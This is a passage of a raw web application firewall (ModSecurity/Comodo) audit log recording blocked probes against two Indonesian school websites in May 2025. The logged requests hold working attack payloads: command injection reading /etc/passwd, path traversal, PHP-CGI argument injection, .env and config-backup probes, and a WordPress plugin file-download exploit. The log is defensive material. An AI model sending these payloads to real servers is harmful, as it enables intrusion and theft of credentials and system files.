"COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /php/ping.php?cmd=cat%20/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747384877223706 1385 (- - -) Stopwatch2: 1747384877223706 1385; combined=442, p1=321, p2=94, p3=0, p4=0, p5=26, sr=66, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2fd56a13-Z-- --f98b9e72-A-- [16/May/2025:15:41:17 +0700] aCb6Lde6THFz1hsaJaKRvwAAABQ 103.236.140.4 47896 103.236.140.4 8181 --f98b9e72-B-- GET /php/file.php?cmd=cat%20/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --f98b9e72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f98b9e72-E-- --f98b9e72-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /php/file.php?cmd=cat%20/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747384877419018 1348 (- - -) Stopwatch2: 1747384877419018 1348; combined=449, p1=332, p2=91, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f98b9e72-Z-- --991a505d-A-- [16/May/2025:15:41:17 +0700] aCb6LdhEtho3ciA0weghtQAAAIw 103.236.140.4 47898 103.236.140.4 8181 --991a505d-B-- GET /php/download.php?cmd=cat%20/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --991a505d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --991a505d-E-- --991a505d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /php/download.php?cmd=cat%20/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747384877613379 1532 (- - -) Stopwatch2: 1747384877613379 1532; combined=467, p1=336, p2=104, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --991a505d-Z-- --0fe81737-A-- [16/May/2025:15:41:17 +0700] aCb6LdhEtho3ciA0weghtgAAAJE 103.236.140.4 47900 103.236.140.4 8181 --0fe81737-B-- GET /download_gambar.php?path=../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --0fe81737-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fe81737-E-- --0fe81737-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_gambar.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747384877808357 1612 (- - -) Stopwatch2: 1747384877808357 1612; combined=488, p1=366, p2=91, p3=0, p4=0, p5=31, sr=115, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fe81737-Z-- --1a412925-A-- [16/May/2025:15:41:18 +0700] aCb6LthEtho3ciA0weghtwAAAIs 103.236.140.4 47902 103.236.140.4 8181 --1a412925-B-- GET /download_video.php?file=../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --1a412925-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a412925-E-- --1a412925-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_video.php?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747384878002801 1566 (- - -) Stopwatch2: 1747384878002801 1566; combined=450, p1=335, p2=90, p3=0, p4=0, p5=25, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a412925-Z-- --674ac854-A-- [16/May/2025:15:41:18 +0700] aCb6Lte6THFz1hsaJaKRwAAAABg 103.236.140.4 47904 103.236.140.4 8181 --674ac854-B-- GET /download.php?path=../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --674ac854-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --674ac854-E-- --674ac854-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747384878197115 1689 (- - -) Stopwatch2: 1747384878197115 1689; combined=537, p1=365, p2=147, p3=0, p4=0, p5=25, sr=78, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --674ac854-Z-- --5765686f-A-- [16/May/2025:15:41:18 +0700] aCb6LkE0LfP59mkCzg73dgAAAMI 103.236.140.4 47906 103.236.140.4 8181 --5765686f-B-- GET /download.php?file=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --5765686f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5765686f-E-- --5765686f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747384878391694 1680 (- - -) Stopwatch2: 1747384878391694 1680; combined=446, p1=330, p2=91, p3=0, p4=0, p5=25, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5765686f-Z-- --348acc3f-A-- [16/May/2025:15:41:18 +0700] aCb6Lte6THFz1hsaJaKRwQAAAAE 103.236.140.4 47908 103.236.140.4 8181 --348acc3f-B-- GET /download.php?file=../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --348acc3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --348acc3f-E-- --348acc3f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747384878586069 1544 (- - -) Stopwatch2: 1747384878586069 1544; combined=469, p1=354, p2=90, p3=0, p4=0, p5=25, sr=102, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --348acc3f-Z-- --2de5d72e-A-- [16/May/2025:15:41:18 +0700] aCb6Lte6THFz1hsaJaKRwgAAABY 103.236.140.4 47910 103.236.140.4 8181 --2de5d72e-B-- GET /download_worksheet.php?action=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --2de5d72e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2de5d72e-E-- --2de5d72e-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_worksheet.php?action=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747384878780521 1325 (- - -) Stopwatch2: 1747384878780521 1325; combined=412, p1=309, p2=78, p3=0, p4=0, p5=25, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2de5d72e-Z-- --6457f936-A-- [16/May/2025:15:41:23 +0700] aCb6M9e6THFz1hsaJaKR3QAAAAA 103.236.140.4 47970 103.236.140.4 8181 --6457f936-B-- GET /dev/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --6457f936-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6457f936-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384883852737 671 (- - -) Stopwatch2: 1747384883852737 671; combined=257, p1=230, p2=0, p3=0, p4=0, p5=27, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6457f936-Z-- --583cd369-A-- [16/May/2025:15:41:24 +0700] aCb6NNe6THFz1hsaJaKR4gAAAAY 103.236.140.4 47982 103.236.140.4 8181 --583cd369-B-- GET /application/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --583cd369-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --583cd369-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384884673196 711 (- - -) Stopwatch2: 1747384884673196 711; combined=298, p1=266, p2=0, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --583cd369-Z-- --e5324a25-A-- [16/May/2025:15:43:37 +0700] aCb6ude6THFz1hsaJaKUBgAAABE 103.236.140.4 49358 103.236.140.4 8181 --e5324a25-B-- GET /config.inc.php.old HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --e5324a25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5324a25-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".inc.php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747385017529381 1893 (- - -) Stopwatch2: 1747385017529381 1893; combined=697, p1=317, p2=348, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5324a25-Z-- --8bee7b72-A-- [16/May/2025:15:43:37 +0700] aCb6ude6THFz1hsaJaKUCAAAAAA 103.236.140.4 49362 103.236.140.4 8181 --8bee7b72-B-- GET /config.inc.php.bak HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --8bee7b72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8bee7b72-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".inc.php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747385017919638 1550 (- - -) Stopwatch2: 1747385017919638 1550; combined=645, p1=311, p2=307, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8bee7b72-Z-- --13a41103-A-- [16/May/2025:15:43:39 +0700] aCb6u9e6THFz1hsaJaKUDwAAAAs 103.236.140.4 49376 103.236.140.4 8181 --13a41103-B-- GET /index.php?-d+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Content-Length: 42 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --13a41103-C-- --13a41103-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13a41103-E-- --13a41103-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input: -d allow_url_include=on -d auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747385019293650 2625 (- - -) Stopwatch2: 1747385019293650 2625; combined=1478, p1=346, p2=1106, p3=0, p4=0, p5=26, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13a41103-Z-- --36e94e27-A-- [16/May/2025:15:43:40 +0700] aCb6vNe6THFz1hsaJaKUEwAAAA0 103.236.140.4 49384 103.236.140.4 8181 --36e94e27-B-- GET /phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --36e94e27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36e94e27-E-- --36e94e27-H-- Message: Access denied with code 403 (phase 2). 
Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747385020269758 1595 (- - -) Stopwatch2: 1747385020269758 1595; combined=496, p1=323, p2=136, p3=0, p4=0, p5=37, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36e94e27-Z-- --35166163-A-- [16/May/2025:15:43:41 +0700] aCb6vde6THFz1hsaJaKUGwAAAAY 103.236.140.4 49400 103.236.140.4 8181 --35166163-B-- GET /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --35166163-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --35166163-E-- 
